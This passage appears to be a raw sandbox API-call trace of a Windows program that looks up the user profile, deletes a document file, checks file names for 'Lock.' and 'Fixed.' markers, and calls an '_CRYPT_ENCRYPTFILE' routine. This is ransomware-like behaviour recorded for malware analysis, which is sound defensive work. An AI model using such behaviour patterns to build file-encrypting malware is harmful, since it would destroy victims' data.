lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0266.906] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.906] CloseHandle (hObject=0x2a0) returned 1 [0266.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0266.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0266.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0266.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0266.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0266.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0266.912] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.913] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.913] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.913] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/pFCcGpVbcXPSBWLa.pps", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\pFCcGpVbcXPSBWLa.pps", lpFilePart=0x8cedf4*="pFCcGpVbcXPSBWLa.pps") returned 0x2e [0266.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0266.913] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\pFCcGpVbcXPSBWLa.pps" (normalized: "c:\\users\\fd1hvy\\documents\\pfccgpvbcxpsbwla.pps")) returned 0x20 [0266.913] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\pFCcGpVbcXPSBWLa.pps", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f59cac0, ftCreationTime.dwHighDateTime=0x1d5ef53, ftLastAccessTime.dwLowDateTime=0x311e1fb0, ftLastAccessTime.dwHighDateTime=0x1d5e669, ftLastWriteTime.dwLowDateTime=0x311e1fb0, ftLastWriteTime.dwHighDateTime=0x1d5e669, nFileSizeHigh=0x0, nFileSizeLow=0x142d7, dwReserved0=0x1, dwReserved1=0x1c, cFileName="pFCcGpVbcXPSBWLa.pps", cAlternateFileName="PFCCGP~1.PPS")) returned 0xa87050 [0266.913] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\pFCcGpVbcXPSBWLa.pps" (normalized: "c:\\users\\fd1hvy\\documents\\pfccgpvbcxpsbwla.pps")) returned 1 [0266.932] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f59cac0, ftCreationTime.dwHighDateTime=0x1d5ef53, ftLastAccessTime.dwLowDateTime=0x311e1fb0, ftLastAccessTime.dwHighDateTime=0x1d5e669, ftLastWriteTime.dwLowDateTime=0x311e1fb0, ftLastWriteTime.dwHighDateTime=0x1d5e669, nFileSizeHigh=0x0, nFileSizeLow=0x142d7, dwReserved0=0x1, dwReserved1=0x1c, cFileName="pFCcGpVbcXPSBWLa.pps", cAlternateFileName="PFCCGP~1.PPS")) returned 0 [0266.932] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0266.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0266.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0266.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0266.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0266.932] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0266.932] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0266.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0266.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0266.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0266.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0266.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0266.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5e) returned 0x2e558d8 [0266.933] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/pFCcGpVbcXPSBWLa.pps", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\pFCcGpVbcXPSBWLa.pps", lpFilePart=0x8cf650*="pFCcGpVbcXPSBWLa.pps") returned 0x2e [0266.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0266.934] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\pFCcGpVbcXPSBWLa.pps" (normalized: "c:\\users\\fd1hvy\\documents\\pfccgpvbcxpsbwla.pps")) returned 0xffffffff [0266.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0266.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0266.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0266.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0266.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.934] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0266.934] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.934] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0266.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0266.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0266.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0266.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0266.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0266.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pTQouiVh4lNVdQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TQouiVh4lNVdQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QouiVh4lNVdQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ouiVh4lNVdQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uiVh4lNVdQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iVh4lNVdQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vh4lNVdQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h4lNVdQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4lNVdQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lNVdQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NVdQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VdQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QWF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WF_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0266.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0266.936] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0266.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0266.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0266.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2e) returned 0x2e55ea0 [0266.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pTQouiVh4lNVdQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TQouiVh4lNVdQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QouiVh4lNVdQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ouiVh4lNVdQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uiVh4lNVdQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iVh4lNVdQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vh4lNVdQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h4lNVdQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4lNVdQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lNVdQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NVdQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VdQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QWF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WF_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_W.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0266.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0266.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0266.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0266.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0266.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0266.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.938] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0266.938] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0266.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.938] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0266.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0266.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0266.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.939] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 